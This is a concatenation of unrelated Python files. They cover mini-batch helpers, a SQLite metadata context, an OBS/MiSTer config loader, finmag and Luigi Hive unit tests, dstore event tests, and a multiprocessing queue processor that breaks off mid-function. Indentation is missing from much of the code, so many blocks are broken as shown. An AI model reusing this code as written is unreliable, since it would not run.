yield (sample, class_idx)
def _mini_batches(samples, batch_size, num_batches):
"""
Generate mini-batches from some data.
Returns:
An iterable of sequences of (input, label) pairs,
where each sequence is a mini-batch.
"""
cur_batch = []
samples = list(samples)
batch_count = 0
while True:
random.shuffle(samples)
for sample in samples:
cur_batch.append(sample)
if len(cur_batch) < batch_size:
continue
yield cur_batch
cur_batch = []
batch_count += 1
if batch_count == num_batches:
return
def _split_train_test(samples, test_shots=1):
"""
Split a few-shot task into a train and a test set.
Args:
samples: an iterable of (input, label) pairs.
test_shots: the number of examples per class in the
test set.
Returns:
A tuple (train, test), where train and test are
sequences of (input, label) pairs.
"""
train_set = list(samples)
test_set = []
labels = set(item[1] for item in train_set)
for _ in range(test_shots):
for label in labels:
for i, item in enumerate(train_set):
if item[1] == label:
del train_set[i]
test_set.append(item)
break
if len(test_set) < len(labels) * test_shots:
raise IndexError('not enough examples of each class for test set')
return train_set, test_set
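if __name__ == '__main__':
    # Quick illustrative check of the batching helpers on toy data (not part of
    # the training pipeline): four (input, label) pairs from two classes.
    toy_samples = [('a0', 0), ('a1', 0), ('b0', 1), ('b1', 1)]
    toy_train, toy_test = _split_train_test(toy_samples, test_shots=1)
    print('train:', toy_train)  # one example per class was moved to the test set
    print('test:', toy_test)
    for toy_batch in _mini_batches(toy_train, batch_size=2, num_batches=3):
        print('batch:', toy_batch)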
|
from contextlib import contextmanager
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import Session
from pydas_metadata.contexts.base import BaseContext, session_factory
class MemoryContext(BaseContext):
"""
Memory connection context, handles data store session setup and object insertion.
This context supports both the SQLite database and in-memory metadata storage.
Example
-------
>>> from pydas_metadata.models import Base
>>> from pydas_metadata.contexts import MemoryContext
>>> context = MemoryContext()
>>> Base.metadata.create_all(context.engine)
In this example we create an in-memory data context, which is useful when you do not need to
persist the data, or when the data is already persisted elsewhere. Once the context is
created, it's passed to the `Base.metadata.create_all(context.engine)` function, which
initializes the in-memory database.
Example
-------
>>> from pydas_metadata.contexts import MemoryContext
>>> from pydas_metadata.models import Company
>>> context = MemoryContext(database='metadata.sqlite')
    >>> with context.get_session() as session:
    ...     for company in session.query(Company).all():
    ...         print(company.symbol)
In this example, we connect to a SQLite database, query all
:class:`pydas_metadata.models.Company` objects, and print each company's symbol.
"""
def __init__(self, **config):
connection_path = (config['database']
if 'database' in config
else ':memory:')
self.engine = create_engine(f'sqlite:///{connection_path}')
session_factory.configure(bind=self.engine)
@classmethod
def can_handle(cls, context_type: str) -> bool:
return context_type == 'sqlite'
@contextmanager
def get_session(self):
"""Returns a Session factory object for connecting to the database"""
try:
session: Session = session_factory()
yield session
session.commit()
except:
session.rollback()
raise
finally:
session.close()
|
import json
import os
config_file = 'config.json'
config = {}
def create_config():
config = {}
main = {}
main["mister_ip"] = "000.000.00.000"
main["mister_username"] = "root"
main["mister_password"] = "1"
main["change_scenes"] = True
main["debug"] = False
main["custom_text_sources"] = { "GameName": "Playing {game} on {core}" }
main["refresh_rate"] = "1"
main["core_storage"] = "fat"
main["pause_scenes"] = [ "Pause Scene" ]
config["main"] = main
obs = {}
obs['host'] = "localhost"
obs['port'] = "4444"
obs['password'] = ""
config["obs"] = obs
with open(config_file, "w") as write_file:
json.dump(config, write_file, indent=4)
def load_config():
global config
if os.path.exists(config_file):
with open(config_file) as config_text:
config = json.load(config_text)
else:
print("Creating config. Update new conif with proper details")
create_config()
def get_config():
return config
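# Typical usage (sketch): import this module and call get_config() after import,
# e.g. get_config()["main"]["mister_ip"]; load_config() below runs at import time.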
load_config()
if __name__ == "__main__":
print(get_config())
|
import dolfin as df
import numpy as np
from math import pi
from finmag.util.meshes import sphere
from fk_demag import FKDemagDG as FKDemag
from finmag.util.consts import mu0
radius = 1.0
maxh = 0.2
unit_length = 1e-9
volume = 4 * pi * (radius * unit_length) ** 3 / 3
def setup_demag_sphere(Ms):
mesh = sphere(r=radius, maxh=maxh)
S3 = df.VectorFunctionSpace(mesh, "DG", 0)
m = df.Function(S3)
m.assign(df.Constant((1, 0, 0)))
demag = FKDemag()
demag.setup(S3, m, Ms, unit_length)
return demag
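# The tests below compare against the analytic result for a uniformly magnetised
# sphere: the demagnetising field inside the sphere is H = -M/3, hence the energy
# is E = -mu0/2 * Integral(H . M) dV = (1/6) * mu0 * Ms^2 * V.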
def test_interaction_accepts_name():
"""
Check that the interaction accepts a 'name' argument and has a 'name' attribute.
"""
demag = FKDemag(name='MyDemag')
assert hasattr(demag, 'name')
def test_demag_field_for_uniformly_magnetised_sphere():
demag = setup_demag_sphere(Ms=1)
H = demag.compute_field().reshape((3, -1))
H_expected = np.array([-1.0 / 3.0, 0.0, 0.0])
print "Got demagnetising field H =\n{}.\nExpected mean H = {}.".format(
H, H_expected)
TOL = 8e-3
diff = np.max(np.abs(H - H_expected[:, np.newaxis]), axis=1)
print "Maximum difference to expected result per axis is {}. Comparing to limit {}.".format(diff, TOL)
assert np.max(diff) < TOL
TOL = 12e-3
spread = np.abs(H.max(axis=1) - H.min(axis=1))
print "The values spread {} per axis. Comparing to limit {}.".format(spread, TOL)
assert np.max(spread) < TOL
def test_demag_energy_for_uniformly_magnetised_sphere():
Ms = 800e3
demag = setup_demag_sphere(Ms)
E = demag.compute_energy()
E_expected = (1.0 / 6.0) * mu0 * Ms ** 2 * volume # -mu0/2 Integral H * M with H = - M / 3
print "Got E = {}. Expected E = {}.".format(E, E_expected)
REL_TOL = 3e-2
rel_diff = abs(E - E_expected) / abs(E_expected)
print "Relative difference is {:.3g}%. Comparing to limit {:.3g}%.".format(
100 * rel_diff, 100 * REL_TOL)
assert rel_diff < REL_TOL
def test_energy_density_for_uniformly_magnetised_sphere():
Ms = 800e3
demag = setup_demag_sphere(Ms)
rho = demag.energy_density()
E_expected = (1.0 / 6.0) * mu0 * Ms**2 * volume # -mu0/2 Integral H * M with H = - M / 3
rho_expected = E_expected / volume
print "Got mean rho = {:.3e}. Expected rho = {:.3e}.".format(np.mean(rho), rho_expected)
REL_TOL = 1.8e-2
rel_diff = np.max(np.abs(rho - rho_expected)) / abs(rho_expected)
print "Maximum relative difference = {:.3g}%. Comparing to limit {:.3g}%.".format(
100 * rel_diff, 100 * REL_TOL)
assert rel_diff < REL_TOL
def test_energy_density_for_uniformly_magnetised_sphere_as_function():
Ms = 800e3
demag = setup_demag_sphere(Ms)
rho = demag.energy_density_function()
print "Probing the energy density at the center of the sphere."
rho_center = rho([0.0, 0.0, 0.0])
E_expected = (1.0 / 6.0) * mu0 * Ms**2 * volume # -mu0/2 Integral H * M with H = - M / 3
rho_expected = E_expected / volume
print "Got rho = {:.3e}. Expected rho = {:.3e}.".format(rho_center, rho_expected)
REL_TOL = 1.3e-2
rel_diff = np.max(np.abs(rho_center - rho_expected)) / abs(rho_expected)
print "Maximum relative difference = {:.3g}%. Comparing to limit {:.3g}%.".format(
100 * rel_diff, 100 * REL_TOL)
assert rel_diff < REL_TOL
def test_regression_Ms_numpy_type():
mesh = sphere(r=radius, maxh=maxh)
S3 = df.VectorFunctionSpace(mesh, "DG", 0)
m = df.Function(S3)
m.assign(df.Constant((1, 0, 0)))
Ms = np.sqrt(6.0 / mu0) # math.sqrt(6.0 / mu0) would work
demag = FKDemag()
demag.setup(S3, m, Ms, unit_length) # this used to fail
|
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import tempfile
from helpers import unittest
from luigi import six
import luigi.contrib.hive
import mock
from luigi import LocalTarget
class HiveTest(unittest.TestCase):
count = 0
def mock_hive_cmd(self, args, check_return=True):
self.last_hive_cmd = args
self.count += 1
return "statement{0}".format(self.count)
def setUp(self):
self.run_hive_cmd_saved = luigi.contrib.hive.run_hive
luigi.contrib.hive.run_hive = self.mock_hive_cmd
def tearDown(self):
luigi.contrib.hive.run_hive = self.run_hive_cmd_saved
def test_run_hive_command(self):
pre_count = self.count
res = luigi.contrib.hive.run_hive_cmd("foo")
self.assertEqual(["-e", "foo"], self.last_hive_cmd)
self.assertEqual("statement{0}".format(pre_count + 1), res)
def test_run_hive_script_not_exists(self):
def test():
luigi.contrib.hive.run_hive_script("/tmp/some-non-existant-file______")
self.assertRaises(RuntimeError, test)
def test_run_hive_script_exists(self):
with tempfile.NamedTemporaryFile(delete=True) as f:
pre_count = self.count
res = luigi.contrib.hive.run_hive_script(f.name)
self.assertEqual(["-f", f.name], self.last_hive_cmd)
self.assertEqual("statement{0}".format(pre_count + 1), res)
def test_create_parent_dirs(self):
dirname = "/tmp/hive_task_test_dir"
class FooHiveTask(object):
def output(self):
return LocalTarget(os.path.join(dirname, "foo"))
runner = luigi.contrib.hive.HiveQueryRunner()
runner.prepare_outputs(FooHiveTask())
self.assertTrue(os.path.exists(dirname))
class HiveCommandClientTest(unittest.TestCase):
"""Note that some of these tests are really for the CDH releases of Hive, to which I do not currently have access.
Hopefully there are no significant differences in the expected output"""
def setUp(self):
self.client = luigi.contrib.hive.HiveCommandClient()
self.apacheclient = luigi.contrib.hive.ApacheHiveCommandClient()
self.metastoreclient = luigi.contrib.hive.MetastoreClient()
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_default_table_location(self, run_command):
run_command.return_value = "Protect Mode: None \n" \
"Retention: 0 \n" \
"Location: hdfs://localhost:9000/user/hive/warehouse/mytable \n" \
"Table Type: MANAGED_TABLE \n"
returned = self.client.table_location("mytable")
self.assertEqual('hdfs://localhost:9000/user/hive/warehouse/mytable', returned)
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_table_exists(self, run_command):
run_command.return_value = "OK"
returned = self.client.table_exists("mytable")
self.assertFalse(returned)
run_command.return_value = "OK\n" \
"mytable"
returned = self.client.table_exists("mytable")
self.assertTrue(returned)
# Issue #896 test case insensitivity
returned = self.client.table_exists("MyTable")
self.assertTrue(returned)
run_command.return_value = "day=2013-06-28/hour=3\n" \
"day=2013-06-28/hour=4\n" \
"day=2013-07-07/hour=2\n"
self.client.partition_spec = mock.Mock(name="partition_spec")
self.client.partition_spec.return_value = "somepart"
returned = self.client.table_exists("mytable", partition={'a': 'b'})
self.assertTrue(returned)
run_command.return_value = ""
returned = self.client.table_exists("mytable", partition={'a': 'b'})
self.assertFalse(returned)
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_table_schema(self, run_command):
run_command.return_value = "FAILED: SemanticException [Error 10001]: blah does not exist\nSome other stuff"
returned = self.client.table_schema("mytable")
self.assertFalse(returned)
run_command.return_value = "OK\n" \
"col1 string None \n" \
"col2 string None \n" \
"col3 string None \n" \
"day string None \n" \
"hour smallint None \n\n" \
"# Partition Information \n" \
"# col_name data_type comment \n\n" \
"day string None \n" \
"hour smallint None \n" \
"Time taken: 2.08 seconds, Fetched: 34 row(s)\n"
expected = [('OK',),
('col1', 'string', 'None'),
('col2', 'string', 'None'),
('col3', 'string', 'None'),
('day', 'string', 'None'),
('hour', 'smallint', 'None'),
('',),
('# Partition Information',),
('# col_name', 'data_type', 'comment'),
('',),
('day', 'string', 'None'),
('hour', 'smallint', 'None'),
('Time taken: 2.08 seconds, Fetched: 34 row(s)',)]
returned = self.client.table_schema("mytable")
self.assertEqual(expected, returned)
def test_partition_spec(self):
returned = self.client.partition_spec({'a': 'b', 'c': 'd'})
self.assertEqual("`a`='b',`c`='d'", returned)
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_apacheclient_table_exists(self, run_command):
run_command.return_value = "OK"
returned = self.apacheclient.table_exists("mytable")
self.assertFalse(returned)
run_command.return_value = "OK\n" \
"mytable"
returned = self.apacheclient.table_exists("mytable")
self.assertTrue(returned)
# Issue #896 test case insensitivity
returned = self.apacheclient.table_exists("MyTable")
self.assertTrue(returned)
run_command.return_value = "day=2013-06-28/hour=3\n" \
"day=2013-06-28/hour=4\n" \
"day=2013-07-07/hour=2\n"
self.apacheclient.partition_spec = mock.Mock(name="partition_spec")
self.apacheclient.partition_spec.return_value = "somepart"
returned = self.apacheclient.table_exists("mytable", partition={'a': 'b'})
self.assertTrue(returned)
run_command.return_value = ""
returned = self.apacheclient.table_exists("mytable", partition={'a': 'b'})
self.assertFalse(returned)
@mock.patch("luigi.contrib.hive.run_hive_cmd")
def test_apacheclient_table_schema(self, run_command):
run_command.return_value = "FAILED: SemanticException [Error 10001]: Table not found mytable\nSome other stuff"
returned = self.apacheclient.table_schema("mytable")
self.assertFalse(returned)
run_command.return_value = "OK\n" \
"col1 string None \n" \
"col2 string None \n" \
"col3 string None \n" \
"day string None \n" \
"hour smallint None \n\n" \
"# Partition Information \n" \
"# col_name data_type comment \n\n" \
"day string None \n" \
"hour smallint None \n" \
"Time taken: 2.08 seconds, Fetched: 34 row(s)\n"
expected = [('OK',),
('col1', 'string', 'None'),
('col2', 'string', 'None'),
('col3', 'string', 'None'),
('day', 'string', 'None'),
('hour', 'smallint', 'None'),
('',),
('# Partition Information',),
('# col_name', 'data_type', 'comment'),
('',),
('day', 'string', 'None'),
('hour', 'smallint', 'None'),
('Time taken: 2.08 seconds, Fetched: 34 row(s)',)]
returned = self.apacheclient.table_schema("mytable")
self.assertEqual(expected, returned)
@mock.patch("luigi.contrib.hive.HiveThriftContext")
def test_metastoreclient_partition_existence_regardless_of_order(self, thrift_context):
thrift_context.return_value = thrift_context
client_mock = mock.Mock(name="clientmock")
client_mock.return_value = client_mock
thrift_context.__enter__ = client_mock
client_mock.get_partition_names = mock.Mock(return_value=["p1=x/p2=y", "p1=a/p2=b"])
partition_spec = OrderedDict([("p1", "a"), ("p2", "b")])
self.assertTrue(self.metastoreclient.table_exists("table", "default", partition_spec))
partition_spec = OrderedDict([("p2", "b"), ("p1", "a")])
self.assertTrue(self.metastoreclient.table_exists("table", "default", partition_spec))
def test_metastore_partition_spec_has_the_same_order(self):
partition_spec = OrderedDict([("p1", "a"), ("p2", "b")])
spec_string = luigi.contrib.hive.MetastoreClient().partition_spec(partition_spec)
self.assertEqual(spec_string, "p1=a/p2=b")
partition_spec = OrderedDict([("p2", "b"), ("p1", "a")])
spec_string = luigi.contrib.hive.MetastoreClient().partition_spec(partition_spec)
self.assertEqual(spec_string, "p1=a/p2=b")
@mock.patch("luigi.configuration")
def test_client_def(self, hive_syntax):
hive_syntax.get_config.return_value.get.return_value = "cdh4"
client = luigi.contrib.hive.get_default_client()
self.assertEqual(luigi.contrib.hive.HiveCommandClient, type(client))
hive_syntax.get_config.return_value.get.return_value = "cdh3"
client = luigi.contrib.hive.get_default_client()
self.assertEqual(luigi.contrib.hive.HiveCommandClient, type(client))
hive_syntax.get_config.return_value.get.return_value = "apache"
client = luigi.contrib.hive.get_default_client()
self.assertEqual(luigi.contrib.hive.ApacheHiveCommandClient, type(client))
hive_syntax.get_config.return_value.get.return_value = "metastore"
client = luigi.contrib.hive.get_default_client()
self.assertEqual(luigi.contrib.hive.MetastoreClient, type(client))
@mock.patch('subprocess.Popen')
def test_run_hive_command(self, popen):
# I'm testing this again to check the return codes
# I didn't want to tear up all the existing tests to change how run_hive is mocked
comm = mock.Mock(name='communicate_mock')
comm.return_value = "some return stuff", ""
preturn = mock.Mock(name='open_mock')
preturn.returncode = 0
preturn.communicate = comm
popen.return_value = preturn
returned = luigi.contrib.hive.run_hive(["blah", "blah"])
self.assertEqual("some return stuff", returned)
preturn.returncode = 17
self.assertRaises(luigi.contrib.hive.HiveCommandError, luigi.contrib.hive.run_hive, ["blah", "blah"])
comm.return_value = "", "some stderr stuff"
returned = luigi.contrib.hive.run_hive(["blah", "blah"], False)
self.assertEqual("", returned)
class MyHiveTask(luigi.contrib.hive.HiveQueryTask):
param = luigi.Parameter()
def query(self):
return 'banana banana %s' % self.param
class TestHiveTask(unittest.TestCase):
task_class = MyHiveTask
@mock.patch('luigi.contrib.hadoop.run_and_track_hadoop_job')
def test_run(self, run_and_track_hadoop_job):
success = luigi.run([self.task_class.__name__, '--param', 'foo', '--local-scheduler', '--no-lock'])
self.assertTrue(success)
self.assertEqual('hive', run_and_track_hadoop_job.call_args[0][0][0])
class MyHiveTaskArgs(MyHiveTask):
def hivevars(self):
return {'my_variable1': 'value1', 'my_variable2': 'value2'}
def hiveconfs(self):
return {'hive.additional.conf': 'conf_value'}
class TestHiveTaskArgs(TestHiveTask):
task_class = MyHiveTaskArgs
def test_arglist(self):
task = self.task_class(param='foo')
f_name = 'my_file'
runner = luigi.contrib.hive.HiveQueryRunner()
arglist = runner.get_arglist(f_name, task)
f_idx = arglist.index('-f')
self.assertEqual(arglist[f_idx + 1], f_name)
hivevars = ['{}={}'.format(k, v) for k, v in six.iteritems(task.hivevars())]
for var in hivevars:
idx = arglist.index(var)
self.assertEqual(arglist[idx - 1], '--hivevar')
hiveconfs = ['{}={}'.format(k, v) for k, v in six.iteritems(task.hiveconfs())]
for conf in hiveconfs:
idx = arglist.index(conf)
self.assertEqual(arglist[idx - 1], '--hiveconf')
class TestHiveTarget(unittest.TestCase):
def test_hive_table_target(self):
client = mock.Mock()
target = luigi.contrib.hive.HiveTableTarget(database='db', table='foo', client=client)
target.exists()
client.table_exists.assert_called_with('foo', 'db')
def test_hive_partition_target(self):
client = mock.Mock()
target = luigi.contrib.hive.HivePartitionTarget(database='db', table='foo', partition='bar', client=client)
target.exists()
client.table_exists.assert_called_with('foo', 'db', 'bar')
|
#
# Copyright 2004 - 2006 Dave Cridland <dave@cridland.net>
#
# This file forms part of the Infotrope Python Library.
#
# The Infotrope Python Library is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# The Infotrope Python Library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the Infotrope Python Library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
class caller:
def __init__( self, callee, *args, **kw ):
self.callee = callee
self.args = args
self.kw = kw
def __call__( self ):
self.callee( *self.args, **self.kw )
self.callee = None
self.args = None
self.kw = None
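# Note: `caller` packages a callable together with its arguments so it can be
# invoked later with no arguments; after the single call it drops its references,
# so a second call fails loudly (self.callee is None by then).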
class environment:
def __init__( self, logging=False, protologging=None ):
self.logging = logging
self.protologging = protologging
if self.protologging is None:
self.protologging = self.logging
self.sock_delay = None
self.sock_bandwidth = None
self.sock_readable = None
self.sock_writable = None
self.defcall = False
def defer_call( self, obj, *args, **kw ):
obj( *args, **kw )
def callback( self, mech, vals ):
raise "__ABSTRACT__"
def logger( self, *txt ):
pass
def proto_logger( self, uri, time, txt ):
self.logger( str(uri), str(time), str(txt) )
def alert( self, uri, text ):
raise "__ABSTRACT__"
def secquery( self, mech, question ):
raise "__ABSTRACT__"
def status( self, text ):
pass
def make_operation( self, title, status=None, pmax=None ):
return None
class cli_environment(environment):
def __init__( self, logging=False, protologging=None ):
environment.__init__( self, logging, protologging )
def callback( self, mech, vals ):
print "Need user information for",mech.mechname,"login to",mech.sasl.service,"on",mech.uri().server
import getpass
for x,v in vals.items():
if x == 'password':
vals[x] = getpass.getpass( 'Password: ' )
else:
vals[x] = raw_input( x+': ' )
return vals
def logger( self, *txt ):
print "LOG : ",`txt`
def alert( self, uri, text ):
print "** Alert from %s!" % uri
print " %s" % text
def secquery( self, mech, question ):
print "Security Question\n%s" % question
a = raw_input( "y/N?" )
if a and a[0].upper() == 'Y':
return True
return False
def status( self, text ):
if self.logging:
self.logger( text )
|
from nose.tools import eq_, raises
from . import BaseTest, Car
from dstore.Error import EventNotFound, EventListenerNotFound, InstanceNotFound
class CancelAdd( BaseTest ):
    def before_add( self, event, model, instance ):
        self.action = True
        event.cancel()
    def test( self ):
        Car.events.before_add += self.before_add
        Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
        Car.events.before_add -= self.before_add
self.assertRaises( InstanceNotFound, Car.get, 0 )
eq_( self.action, True, "before_add was not executed" )
class Add( BaseTest ):
def before_action( self, event, model, instance ):
self.before = ( model, instance )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test(self):
Car.events.before_add += self.before_action
Car.events.after_add += self.after_action
Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
eq_( issubclass( self.before[0], Car ), True, "before_add was not executed (Model != Car)")
eq_( isinstance( self.before[1], Car ), True, "before_add was not executed (Instance not a Car)")
eq_( issubclass( self.after[0], Car ), True, "after_add was not executed (Model != Car)")
eq_( isinstance( self.after[1], Car ), True, "after_add was not executed (Instance not a Car)")
class Delete( BaseTest ):
def before_action( self, event, model, instance ):
self.before = ( model, instance )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test(self):
Car.events.before_delete += self.before_action
Car.events.after_delete += self.after_action
car = Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
car.delete()
eq_( issubclass( self.before[0], Car ), True, "before_delete was not executed (Model != Car)")
eq_( isinstance( self.before[1], Car ), True, "before_delete was not executed (Instance not a Car)")
eq_( issubclass( self.after[0], Car ), True, "after_delete was not executed (Model != Car)")
eq_( isinstance( self.after[1], Car ), True, "after_delete was not executed (Instance not a Car)")
class Update( BaseTest ):
def before_action( self, event, model, instance ):
self.before = ( model, instance )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test(self):
Car.events.before_update += self.before_action
Car.events.after_update += self.after_action
car = Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
car.year = 2016
car.update()
eq_( issubclass( self.before[0], Car ), True, "before_update was not executed (Model != Car)")
eq_( isinstance( self.before[1], Car ), True, "before_update was not executed (Instance not a Car)")
eq_( issubclass( self.after[0], Car ), True, "after_update was not executed (Model != Car)")
eq_( isinstance( self.after[1], Car ), True, "after_update was not executed (Instance not a Car)")
class All( BaseTest ):
def before_action( self, event, model ):
self.before = model
def after_action( self, event, model, instances ):
self.after = ( model, instances )
def test( self ):
Car.events.before_all += self.before_action
Car.events.after_all += self.after_action
Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
Car( manufacturer = "Holden", make = "Commodore", year = 2006 ).add()
Car( manufacturer = "Holden", make = "Commodore", year = 2007 ).add()
Car( manufacturer = "Holden", make = "Commodore", year = 2008 ).add()
Car.all()
eq_( issubclass( self.before, Car ), True, "before_all was not executed (Model != Car)" )
eq_( issubclass( self.after[0], Car ), True, "after_all was not execute (Model != Car)" )
eq_( isinstance( self.after[1], list ), True, "after_all was not execute (Instance != List)" )
eq_( isinstance( self.after[1][0], Car), True, "after_all was not execute (Instance[0] != Car)" )
class Get( BaseTest ):
def before_action( self, event, model, row_id ):
self.before = ( model, row_id )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test( self ):
Car.events.before_get += self.before_action
Car.events.after_get += self.after_action
Car( manufacturer = "Holden", make = "Commodore", year = 2005 ).add()
Car( manufacturer = "Holden", make = "Commodore", year = 2006 ).add()
Car.get( 1 )
eq_( issubclass( self.before[0], Car ), True, "before_get was not executed (Model != Car)" )
eq_( self.before[1], 1, "before_get was not executed (row_id != 1)" )
eq_( issubclass( self.after[0], Car ), True, "after_get was not executed (Model != Car)" )
eq_( isinstance( self.after[1], Car ), True, "after_get was not executed (Instance != Car)" )
        eq_( self.after[1].year, 2005, "after_get was not executed (Instance.year != 2005)" )
class Empty( BaseTest ):
def before_action( self, event, model ):
self.before = model
def after_action( self, event, model ):
self.after = model
def test( self ):
Car.events.before_empty += self.before_action
Car.events.after_empty += self.after_action
Car(manufacturer="Holden", make="Commodore", year=2005).add()
Car(manufacturer="Holden", make="Commodore", year=2006).add()
Car.empty()
eq_( issubclass( self.before, Car ), True, "before_empty was not executed (Model != Car)" )
eq_( issubclass( self.after, Car ), True, "after_empty was not execute (Model != Car)" )
class Create( BaseTest ):
auto_create = False
def before_action( self, event, model ):
self.before = model
def after_action( self, event, model ):
self.after = model
def test( self ):
Car.events.before_create += self.before_action
Car.events.after_create += self.after_action
Car.create()
Car.destroy()
eq_( issubclass( self.before, Car), True, "before_create was not execute (Model != Car)" )
eq_( issubclass( self.after, Car ), True, "after_create was not execute (Model != Car" )
class Destroy( BaseTest ):
auto_create = False
def before_action( self, event, model ):
self.before = model
def after_action( self, event, model ):
self.after = model
def test( self ):
Car.events.before_destroy += self.before_action
Car.events.after_destroy += self.after_action
Car.create()
Car.destroy()
eq_( issubclass( self.before, Car ), True, "before_destroy was not execute (Model != Car)" )
eq_( issubclass( self.after, Car ), True, "after_destroy was not execute (Model != Car" )
class Filter( BaseTest ):
def before_action( self, event, model, params ):
self.before = ( model, params )
def after_action( self, event, model, instances, params ):
self.after = ( model, instances, params )
def test( self ):
Car.events.before_filter += self.before_action
Car.events.after_filter += self.after_action
Car(manufacturer="Holden", make="Commodore", year=2005).add()
Car(manufacturer="Holden", make="Commodore", year=2006).add()
Car(manufacturer="Holden", make="Rodeo", year=2007).add()
Car(manufacturer="Holden", make="Colorado", year=2008).add()
cars = Car.filter( make = "Commodore" )
eq_( issubclass( self.before[0], Car ), True, "before_filter was not executed (Model != Car)" )
eq_( isinstance( self.before[1], dict ), True, "before_filter was not executed (Params != Dict)" )
eq_( self.before[1][ "make" ], "Commodore", "before_filter was not executed (Params['make'] != 'Commodore'" )
eq_( issubclass( self.after[0], Car ), True, "after_filter was not executed (Model != Car)" )
eq_( isinstance( self.after[1], list ), True, "after_filter was not executed (Instances != List)" )
eq_( isinstance( self.after[1][0], Car ), True, "after_filter was not executed (Instances[0] != Car)" )
eq_( isinstance( self.after[2], dict ), True, "after_filter was not executed (Params != Dict)" )
eq_( self.after[2][ "make" ], "Commodore", "after_filter was not executed (Params['make'] != 'Commodore'" )
class Validate( BaseTest ):
def before_action( self, event, model, instance ):
self.before = ( model, instance )
def after_action( self, event, model, instance ):
self.after = ( model, instance )
def test( self ):
Car.events.before_validate += self.before_action
Car.events.after_validate += self.after_action
Car(manufacturer="Holden", make="Commodore", year=2005).add()
eq_( issubclass( self.before[0], Car ), True, "before_validate was not executed (Model != Car)" )
eq_( isinstance( self.before[1], Car ), True, "before_validate was not executed (Instance != Car)" )
eq_( issubclass( self.after[0], Car ), True, "after_validate was not executed (Model != Car)" )
eq_( isinstance( self.after[1], Car ), True, "after_validate was not executed (Instance != Car)" )
|
#!/usr/bin/env python
""" Implementation of asynchronous pipe that easy to use for parallel
calculations.
FastQueueProcessor -- implementation """
__author__ = "Yaroslav Litvinov"
__copyright__ = "Copyright 2016, Rackspace Inc."
__email__ = "yaroslav.litvinov@rackspace.com"
from multiprocessing import Process
from multiprocessing import Pipe
from collections import namedtuple
from collections import deque
_EOF = 'EOF'
_ERROR_OCCURED = "OpMultiprocessingErrorOccured"
def _worker(pipes):
""" worker wrapper to be used with FastQueueProcessor
pipes -- tuple with (read, write) pipes"""
pipe_work, pipe_main = pipes
worker_func = None
worker_1st_arg = None
while True:
try:
if not worker_func:
worker_func = pipe_work.recv()
worker_1st_arg = pipe_work.recv()
else:
                # Read the next data item from the pipe and process it
arg = pipe_work.recv()
# close pipe if 'EOF' received
if arg == _EOF:
pipe_work.close()
pipe_main.close()
break
else:
res = worker_func(worker_1st_arg, arg) #pylint: disable=E1102
pipe_work.send(res)
except EOFError:
break
except:
pipe_work.send(_ERROR_OCCURED)
raise
def _create_worker_proccess(worker, worker_1st_arg):
""" Launch worker process and send via pipe a worker function 'worker'
and initial argument 'worker_1st_arg'. Return worker descriptor.
worker -- worker function is expected to have two arguments :
1st - initial data, 2nd - data object for processing.
It must return result of data processing.
worker_1st_arg -- initial arg to worker function"""
pipe_work, pipe_main = Pipe()
proc = Process(target=_worker, args=((pipe_work, pipe_main), ))
proc.start()
pipe_main.send(worker)
pipe_main.send(worker_1st_arg)
return FastQueueProcessor.FastProc(pipe_work=pipe_work,
pipe_main=pipe_main,
proc=proc)
class FastQueueProcessor:
""" Implementation of asynchronous pipe that easy to use for parallel
calculations. Write data into pipe then read from pipe result of data
processeing. Supports multiple parallel workers which are competing for
data in queue. First read first serve."""
FastProc = namedtuple('FastProc', ['pipe_work', 'pipe_main', 'proc'])
def __init__(self, worker, worker_1st_arg, procn):
self.queue_data = deque()
self.procs = [_create_worker_proccess(worker, worker_1st_arg) \
for _ in xrange(procn)]
self.proc_statuses = [False for i in xrange(procn)]
self.error = False
def _consume_from_queue(self):
""" try to consume data from queue by all available workers
which are ready to consume data """
for i in xrange(len(self.proc_statuses)):
if not self.count():
break
status = self.proc_statuses[i]
if not status:
data = self.queue_data.popleft()
self.procs[i].pipe_main.send(data)
self.proc_statuses[i] = True
def is_any_working(self):
""" return True if any worker is not yet finished data processing """
for status in self.proc_statuses:
if status:
return True
return False
def __del__(self):
""" Send EOF signal to all workers, close pipes and
wait while workers are done."""
for proc in self.procs:
proc.pipe_main.send(_EOF)
proc.pipe_work.close()
proc.pipe_main.close()
proc.proc.join()
def count(self):
""" return data count in queue """
return len(self.queue_data)
def put(self, data):
""" Put data to queue, then try to consume datas from queue
by all available workers which are eager to data"""
self.queue_data.append(data)
self._consume_from_queue()
def poll(self):
""" return True/False is it results available or not """
for proc in self.procs:
if proc.pipe_main.poll():
return True
return False
def get(self):
""" return result available in pipe """
res = None
while True:
if not len(self.queue_data) and not self.is_any_working():
break
for i in xrange(len(self.procs)):
proc = self.procs[i]
if proc.pipe_main.poll():
res = proc.pipe_main.recv()
self.proc_statuses[i] = False
if res == _ERROR_OCCURED:
